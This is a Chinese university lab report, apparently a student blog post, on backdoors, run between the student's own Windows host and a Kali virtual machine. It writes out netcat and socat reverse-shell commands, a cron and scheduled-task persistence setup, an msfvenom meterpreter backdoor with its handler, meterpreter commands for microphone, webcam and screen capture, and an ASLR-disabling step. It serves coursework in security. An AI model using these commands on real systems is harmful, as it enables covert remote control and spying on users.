网络对抗技术Exp2-后门原理与实践

20191330雷清逸 网络对抗技术Exp2-后门原理与实践

  • 学习内容:使用nc实现win,mac,Linux间的后门连接;meterpreter的应用;MSF POST 模块的应用
  • 学习目标:建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。

一、基础知识

  • 1.1 后门概念
    后门就是不经过正常认证流程而访问系统的通道。
    哪里有后门呢?
  • 编译器留后门
  • 操作系统留后门
  • 最常见的当然还是应用程序中留后门
  • 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。
    后门攻击流程:
* 首先得有这么一个程序
	* netcat 系列
	* meterpreter
	* intersect 
	* ...特别多
* 其次得放到系统里 
	* 正版软件故意或被攻击,包含后门
	* 正版库文件中包含后门
	* 本质上,需要诱骗你下载操作的,都属于各种钓鱼吧	 
	* 安装包中包含后门,放到网上供下载
	* 绑定到特定文件中,放到网上供下载
	* 直接发送恶意程序给你
	* 直接发送攻击性钓鱼链接给你,恶意网站种马
	* 捡到个U盘,打开个文件看看?
	* 煤女帅锅拿U盘直接拷给你
	* 攻击系统漏洞,获取控制权后,安装后门	
* 再次还得运行起来
	* 开机自启动技术
	* win的定时任务
	* linux的cron
	* 伪装成常用软件,诱使用户点击
	* 木马化正常软件
* 最后还得不被本机的恶意代码检测程序发现
	* 恶意代码免杀技术 
* 也不能被本机的或网络上的防火墙发现
	* 反弹式连接
	* 加密连接
	* 隧道技术

  • 1.2 常用后门工具

  • NC和Netcat:底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。

  • Meterpreter:一个用来生成后门程序的程序。

  • SoCat:相当于Netcat++,一个超级Netcat工具。在Windows下可以下载socat.rar,使用README作为参考。任何代理、转发等功能都可以用该工具实现。

  • 1.3 实验内容

(1)使用netcat获取主机操作Shell,cron启动 (1分)

(2)使用socat获取主机操作Shell, 任务计划启动 (1分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (1分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(2分)加分内容一并写入本实验报告。
(评分者注意,附加分写在评论里,不要和主分数混在一起)

  • 1.4 问答题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

(2)例举你知道的后门如何启动起来(win及linux)的方式?

(3)Meterpreter有哪些给你映像深刻的功能?

(4)如何发现自己有系统有没有被安装后门?

二、实践操作

实验环境

主机:Windows 10;
靶机:Kali Linux Debian 10;

查看主机IP地址:
截图如下:

主机地址为:192.168.3.100
查看靶机IP地址:
截图如下:

靶机地址为:192.168.58.128

相互Ping通截图:

2.1 使用netcat获取主机操作Shell,启动cron

  • 2.1.1 在主机中使用ncat -l -p 1330(个人学号后四位)监听本机的1330端口
    截图如下:

  • 2.1.2 在虚拟机中使用nc 192.168.3.100(主机IP) 1330 -e /bin/sh连接主机反弹shell
    截图如下:

成功getshell,截图如下:

  • 2.1.3 在虚拟机中获取主机shell
    在虚拟机中用nc -l -p 1330 监听主机1330 端口
    截图如下:

在主机中用ncat -e cmd 192.168.58.128 1330,成功获取到主机shell
截图如下:

成功getshell,截图如下:

  • 2.1.4 在虚拟机中启动cron并在主机监听
    先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)
    截图如下:

在最后一行添加55 * * * * nc 192.168.3.100 1330 -e /bin/sh,即在每个小时的第55分钟反向连接Windows主机的1330端口
截图如下:

等到每小时的55分,在ip地址为192.168.3.100的主机端用ncat -l -p 1330打开监听即可
截图如下:

成功截图如下:

此外,也可以开一个非反弹式后门,在cron中写入nc -l -p 1330 -e /bin/sh,这是攻击机能随时通过nc 主机ip 1330 获得虚拟机的一个Shell

2.2 使用socat获取主机操作Shell,任务计划启动

  • 2.2.1 在Windows获得Linux Shell
    在Kali中用man socat查看使用说明
    截图如下:

在Windows中按Win+R,再输入compmgmt.msc打开计算机管理
截图如下:

在系统工具中的任务计划程序中创建任务

设置任务名称

设置触发器

下一步是新建操作,但在新建操作前,我们需要在Windows上下载socat.rar,并解压后使用。
新建操作,操作设置为启动程序socat.exe,并添加参数tcp-listen:1330 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口1330,同时把cmd.exe的stderr重定向

设置好后我们按下Win+L(通用)或者F10(一些电脑适用)锁定工作台,即把电脑锁屏。解锁后由于Windows防火墙没关,发现弹出UAC警告,说明之前设置成功
如图所示,设置成功:

在Kali中输入命令socat - tcp:192.168.3.100:1330
截图如下:

成功获取Windows的Shell
截图如下:

2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Kali上生成后门可执行程序20191330_backdoor.exe

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.58.128 LPORT=1330 -f exe > 20191330_backdoor.exe,其中

  • LHOST为反弹回连的IP,在这里是要反弹给Kali,也就是Kali的IP
  • LPORT是回连的端口
  • -p 使用的payload。
  • payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
  • -f 生成文件的类型
  • > 输出到哪个文件

截图如下:

在Windows上打开监听
截图如下:

在Kali上用nc 192.168.3.100 1330 < 20191330_backdoor.exe将生成的20191330_backdoor.exe后门程序传过去
截图如下:

在kali上使用msfconsole指令进入msf控制台
截图如下:

对msf控制台进行配置,依次输入以下命令

use exploit/multi/handler		                #使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp		#使用和生成后门程序时相同的payload
set LHOST 192.168.58.128			        #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1330

截图如下:

配置完后如图所示:

接着输入exploit进行监听,在Windows在打开20191330_backdoor.exe后成功获取到Windows的shell
截图如下:

2.4 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 2.4.1 获取目标主机音频
    在之前进入的MSF exploit中输入record_mic指令进行录音(-d可设置时长)
    截图如下:

  • 2.4.2 获取目标主机摄像头
    输入webcam_snap指令控制摄像头进行拍照

  • 2.4.3 截取主机屏幕
    使用screenshot指令可以进行截屏

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(选做)

  • 2.5.1 前期准备
    关闭地址随机化,设置堆栈可执行
    代码如下:
echo "0" > /proc/sys/kernel/randomize_va_space
more /proc/sys/kernel/randomize_va_space

截图如下:

三、基础题问答

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?

答:例如给我发送钓鱼网站,将1CBC的网站伪装成ICBC,诱导我下载所谓的“安全工具”,这些“安全工具”里,很有可能就被植入了后门程序。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:

Win:开机自启;与常用软件捆绑启动;添加用户初始化程序。

Linux:与脚本捆绑触发。

(3)Meterpreter有哪些给你映像深刻的功能?

答:快速提权;生成后门快速便捷;使用方便;程序驻留在内存内,不写入磁盘。

(4)如何发现自己有系统有没有被安装后门?

答:使用火绒等检测软件检测;发现电脑容易出现蓝屏等异常情况;检查用户权限有无扩散。

实验心得

本次实验向我们展示了后门程序的破坏力,它能够轻而易举地监听我们的麦克风;能够调用我们的摄像头;能够截取我们的屏幕截图等等,通过这次实验,我学习了NC、Netcat、socat和Meterpreter等软件的简单操作,更体会到网络时代带给我们的危害,在日后使用计算机时,应学习此次实验中学到的知识,经常使用杀毒软件自查电脑有无后门程序,谨慎下载网络上的资源,从而做到更加安全地使用计算机。
本次实验难度一般,在课题指导员博客的指导下,实践操作环节没有出现太大的问题,总体来说完成度较高。

posted @ 2022-04-01 20:15  20191330雷清逸  阅读(285)  评论(0编辑  收藏  举报